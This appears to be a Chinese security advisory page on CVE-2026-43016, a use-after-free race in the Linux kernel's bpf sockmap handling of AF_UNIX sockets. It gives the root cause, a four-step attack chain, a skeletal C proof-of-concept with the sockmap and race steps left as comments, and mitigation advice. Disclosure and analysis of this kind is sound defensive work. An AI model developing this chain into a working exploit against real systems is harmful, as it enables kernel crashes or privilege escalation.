CVE-2026-43016 CVSS 7.8 高危

Linux Kernel bpf sockmap UAF漏洞 (CVE-2026-43016)

披露日期: 2026-05-01

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43016

漏洞类型

释放后重用 (UAF)

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核中的bpf sockmap组件存在一个释放后重用（Use-After-Free）漏洞。该漏洞源于`sk_psock_verdict_data_ready()`函数在处理AF_UNIX套接字时，未能正确保护对等套接字的`sk->sk_socket`结构。在`unix_stream_sendmsg()`函数中，发送方在持有对等套接字引用计数的情况下释放了锁并调用`sk_data_ready()`，此时对等套接字仍可能经历`sock_orphan()`操作，导致`sk_socket`被释放。随后的访问触发了UAF，可能导致内核崩溃或权限提升。

技术细节

该漏洞的根本原因是并发处理中的竞态条件。在Linux内核网络栈中，`unix_stream_sendmsg()`在发送数据时会调用对端socket的`sk_data_ready()`回调。虽然发送者持有对端`struct sock`的引用计数，防止了sock对象本身被释放，但并未阻止`sock_orphan()`的执行。`sock_orphan()`会释放`sock->sk_socket`指向的结构体，该结构体通常代表socket的inode。由于锁已被释放，在RCU宽限期后，`sk_socket`可能被内存回收。当`sk_psock_verdict_data_ready()`尝试读取`sk->sk_socket->ops`时，访问了已释放的内存（slab-use-after-free），从而引发KASAN报错。攻击者可利用此条件通过本地用户权限触发内核崩溃或执行任意代码。

攻击链分析

STEP 1

创建套接字

攻击者创建一对AF_UNIX流式套接字。

STEP 2

配置Sockmap

利用BPF系统调用，将这些套接字添加到sockmap中，激活`sk_psock`相关的回调函数。

STEP 3

触发数据发送

通过其中一个套接字调用`sendmsg`发送数据，内核执行`unix_stream_sendmsg`并调用对端的`sk_data_ready`。

STEP 4

竞态触发UAF

在回调函数访问`sk->sk_socket`的瞬间，利用并发操作（如关闭或孤儿化套接字）导致该内存被释放，从而触发释放后重用漏洞。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC Concept for CVE-2026-43016
 * This code demonstrates the socket operations required to trigger the race.
 * Requires a kernel configuration with BPF and sockmap enabled.
 */

#include <sys/socket.h>
#include <unistd.h>
#include <linux/bpf.h>
#include <errno.h>

int main() {
    int sv[2];
    int ret;
    
    // Step 1: Create a pair of AF_UNIX sockets
    ret = socketpair(AF_UNIX, SOCK_STREAM, 0, sv);
    if (ret < 0) {
        perror("socketpair");
        return 1;
    }

    // Step 2: Attacker needs to attach sockets to a sockmap via BPF syscall
    // This enables the sk_psock logic and the vulnerable verdict data_ready path.
    // Pseudo-code: bpf_map_update_elem(sockmap_fd, &key, &sv[0], BPF_ANY);
    // Pseudo-code: bpf_map_update_elem(sockmap_fd, &key, &sv[1], BPF_ANY);

    // Step 3: Trigger data transmission
    // The sender calls sendmsg, which invokes unix_stream_sendmsg
    char data[64] = "trigger";
    send(sv[0], data, sizeof(data), 0);

    // Step 4: Concurrent close/orphan operation (Race Window)
    // Simulating the race where the peer socket is orphaned while
    // sk_psock_verdict_data_ready is accessing sk_socket.
    // close(sv[1]); 

    close(sv[0]);
    close(sv[1]);
    return 0;
}

影响范围

Linux Kernel (Mainline)

Linux Kernel (Stable branches prior to commits 18861f8, 68187f1, etc.)

防御指南

临时缓解措施

由于该漏洞需要本地访问权限及BPF功能，建议管理员检查系统配置，如果不需要BPF功能，可考虑禁用或限制非特权用户的BPF加载权限，以减少攻击面。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表